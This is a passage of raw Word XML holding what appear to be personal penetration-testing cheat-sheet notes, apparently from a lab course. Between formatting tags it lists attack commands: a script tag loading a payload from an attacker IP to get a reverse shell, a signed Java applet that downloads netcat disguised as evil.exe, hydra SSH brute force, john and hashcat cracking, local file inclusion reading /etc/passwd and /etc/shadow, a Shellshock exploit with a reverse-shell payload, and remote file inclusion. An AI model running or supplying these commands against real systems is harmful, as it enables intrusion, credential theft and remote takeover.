          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>your url</w:t>
      </w:r>
      <w:r w:rsidR="00500DA2">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F2F1C8" w14:textId="6C5273A0" w:rsidR="007D4B24" w:rsidRDefault="007D4B24" w:rsidP="007D4B24">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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 w:rsidRPr="007D4B24">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;SCRIPT SRC='http://10.11.0.55:8080/Lz77EmwXLlX'&gt;&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A6866D" w14:textId="49540164" w:rsidR="00912409" w:rsidRPr="00912409" w:rsidRDefault="007351F7" w:rsidP="00912409">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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You will get a reverse shell when the victim acesses the URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EE9FB1" w14:textId="7A3CDC85" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Java signed applet attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE4E1DD" w14:textId="0F98A342" w:rsidR="00E62489" w:rsidRDefault="00E62489" w:rsidP="00E62489">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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Compiling the code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBBE035" w14:textId="0971521E" w:rsidR="00E62489" w:rsidRPr="00E62489" w:rsidRDefault="00E62489" w:rsidP="00E62489">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1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javac -source 1.7 -target 1.7 Java.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F3159D" w14:textId="77777777" w:rsidR="00E62489" w:rsidRDefault="00E62489" w:rsidP="00912409">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1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echo “Permissions: all-permissions” &gt; /root/manifest.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F96E868" w14:textId="459111E9" w:rsidR="00912409" w:rsidRPr="00E62489" w:rsidRDefault="00E62489" w:rsidP="00912409">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E62489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jar cvf Java.jar Java.class /root/manifest.txt Java.class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56475684" w14:textId="77777777" w:rsidR="00E62489" w:rsidRDefault="00E62489" w:rsidP="00E62489">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr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Sign the Java applet step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DB2316" w14:textId="77777777" w:rsidR="00E62489" w:rsidRPr="00E62489" w:rsidRDefault="00E62489" w:rsidP="00E62489">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E62489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lastRenderedPageBreak/>
        <w:t>keytool -genkey -alias signapplet -keystore mykeystore -keypass</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E62489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mykeypass -storepass password123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E85B6DC" w14:textId="77777777" w:rsidR="004C3CAA" w:rsidRPr="004C3CAA" w:rsidRDefault="00E62489" w:rsidP="004C3CAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E62489">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Check for the sign</w:t>
      </w:r>
      <w:r w:rsidRPr="00E62489">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E62489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jarsigner -keystore mykeystore -storepass password123 -keypass mykeypass</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E62489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-signedjar SignedJava.jar Java.jar signapplet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5717C0E6" w14:textId="781F3C43" w:rsidR="00E62489" w:rsidRPr="004C3CAA" w:rsidRDefault="00E62489" w:rsidP="004C3CAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C3CAA">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Change to a html file</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3CAA">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004C3CAA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echo '&lt;applet width="1" height="1" id="Java Secure" code="Java.class"</w:t>
      </w:r>
      <w:r w:rsidR="004C3CAA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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004C3CAA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archive="SignedJava.jar"&gt;&lt;param name="1"</w:t>
      </w:r>
      <w:r w:rsidR="004C3CAA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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004C3CAA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value="http://10.11.0.5</w:t>
      </w:r>
      <w:r w:rsidR="004C3CAA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5</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3CAA"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:80/evil.exe"&gt;&lt;/applet&gt;' &gt; /var/www/html/java.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6157BB7E" w14:textId="61FFC3AF" w:rsidR="004C3CAA" w:rsidRDefault="004C3CAA" w:rsidP="004C3CAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr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Next copy the nc.exe and name it evil.exe at our /var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C02EDC9" w14:textId="074EB398" w:rsidR="0095506B" w:rsidRPr="004C3CAA" w:rsidRDefault="0095506B" w:rsidP="0095506B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas-Bold" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas-Bold" w:cs="Consolas-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>cp /usr/share/windows-binaries/nc.exe /var/www/html/evil.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5090E8A4" w14:textId="53E82FDE" w:rsidR="00912409" w:rsidRDefault="00912409" w:rsidP="00912409">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B71A051" w14:textId="012038FE" w:rsidR="0053146A" w:rsidRDefault="0053146A" w:rsidP="00912409">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C371B99" w14:textId="77777777" w:rsidR="0053146A" w:rsidRDefault="0053146A" w:rsidP="00912409">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5995CB31" w14:textId="77777777" w:rsidR="00912409" w:rsidRDefault="00912409" w:rsidP="00912409">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="487136EC" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Brute force </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A54CB9C" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1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/use/share/wordlists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6213EB46" w14:textId="33880657" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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hydra -l root -p pwfile.txt &lt;ip&gt; ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046819D7" w14:textId="77777777" w:rsidR="007139B6" w:rsidRDefault="007139B6" w:rsidP="007139B6">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3135C0D6" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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Password cracking (hash cracking)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADAFC2F" w14:textId="212C4C2D" w:rsidR="00FF3CDC" w:rsidRPr="00FF3CDC" w:rsidRDefault="007351F7" w:rsidP="00FF3CDC">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1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ohn the ripper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E09714A" w14:textId="77777777" w:rsidR="00FF3CDC" w:rsidRDefault="00FF3CDC" w:rsidP="00FF3CDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>john ./alice.txt --format=nt --wordlist=/usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D798AC8" w14:textId="3797E3B1" w:rsidR="00BE3F14" w:rsidRDefault="00FF3CDC" w:rsidP="00BE3F14">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">john –show </w:t>
      </w:r>
      <w:r w:rsidR="00BE3F14">
        <w:t>./</w:t>
      </w:r>
      <w:r>
        <w:t>hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C707334" w14:textId="60A4FF29" w:rsidR="00BE3F14" w:rsidRPr="00FF3CDC" w:rsidRDefault="00BE3F14" w:rsidP="00BE3F14">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE3F14">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>john ./hash.txt --format=nt --show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A963AA" w14:textId="77777777" w:rsidR="0007288C" w:rsidRDefault="007351F7" w:rsidP="0007288C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1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Hashcat: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcat -m &lt;hashtype&gt; hash.txt </w:t>
      </w:r>
      <w:bookmarkStart w:id="25" w:name="OLE_LINK1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/rockyou.txt </w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(hashtypes: </w:t>
      </w:r>
      <w:hyperlink r:id="rId28">
        <w:r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hashcat.net/wiki/doku.php?id=example_hashes</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C227632" w14:textId="723E5B2B" w:rsidR="0007288C" w:rsidRPr="00A13199" w:rsidRDefault="0007288C" w:rsidP="0007288C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1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 w:rsidRPr="0007288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SG"/>
        </w:rPr>
        <w:t>hashcat -m 900 -a 0 dc2240d8ee745db929a6944ae7a8d016</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3C6EFD" w14:textId="2AE6FD57" w:rsidR="00A13199" w:rsidRPr="0007288C" w:rsidRDefault="00A13199" w:rsidP="0007288C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15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findmyhas</w:t>
      </w:r>
      <w:r w:rsidR="00791586">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> MD5 -h </w:t>
      </w:r>
      <w:r w:rsidRPr="00A13199">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e0a6ad80117cbe539c459dafc5291f27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4074DB04" w14:textId="21A41B65" w:rsidR="0007288C" w:rsidRDefault="0007288C" w:rsidP="0007288C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A86DFB1" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73403ECC" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_suakohrasorg" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B60C7A" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc533025672"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>WEB ATTACKS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="1D095B3F" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7"/>
    <w:p w14:paraId="0AFE38D7" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Local file inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D73605" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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&lt;url&gt;../../../../../../etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>%00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C403436" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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s the application being run as root? Can you read /etc/shadow? &gt; Crack passwords found!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061FBFA8" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Shellshock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BCE705" w14:textId="4F0096B8" w:rsidR="000B4E68" w:rsidRPr="005E57C2" w:rsidRDefault="007351F7" w:rsidP="000B4E68">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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f cgi-bin exists, </w:t>
      </w:r>
      <w:hyperlink r:id="rId29">
        <w:r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www.exploit-db.com/exploits/34900/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A2E6EF" w14:textId="0A204E40" w:rsidR="005E57C2" w:rsidRPr="00293438" w:rsidRDefault="00293438" w:rsidP="00293438">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00293438">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="005E57C2" w:rsidRPr="00293438">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ython 34900.py payload=reverse rhost=10.11.1.71 lhost=10.11.0.55 lport=443  pages=/cgi-bin/test.cgi,/cgi-bin/admin.cgi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AC2B22" w14:textId="3B473136" w:rsidR="000B4E68" w:rsidRPr="000B4E68" w:rsidRDefault="000B4E68" w:rsidP="000B4E68">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B4E68">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -H 'User-Agent: () { :; }; echo "CVE-2014-6271 vulnerable" bash -c id' </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="00A47995">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:lang w:val="en-SG"/>
          </w:rPr>
          <w:t>http://10.11.1.71/cgi-bin/admin.cgi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Check vuln to shellshock bug, if it reflect the </w:t>
      </w:r>
      <w:r w:rsidRPr="000B4E68">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>"CVE-2014-6271 vulnerable" bash -c id'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> most likely vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E5962C" w14:textId="77777777" w:rsidR="00077C80" w:rsidRDefault="00077C80" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56AB288E" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Remote file inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3FA3E0" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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&lt;url&gt;/&lt;hosted file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477ED5D7" w14:textId="5B1656E1" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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&lt;url&gt;/&lt;hosted file&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">? </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(sometimes your file has to have an escape character behind it, so try different things- ? is most common)</w:t>
      </w:r>
      <w:r w:rsidR="00496F66">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – delimiter </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DE708B" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
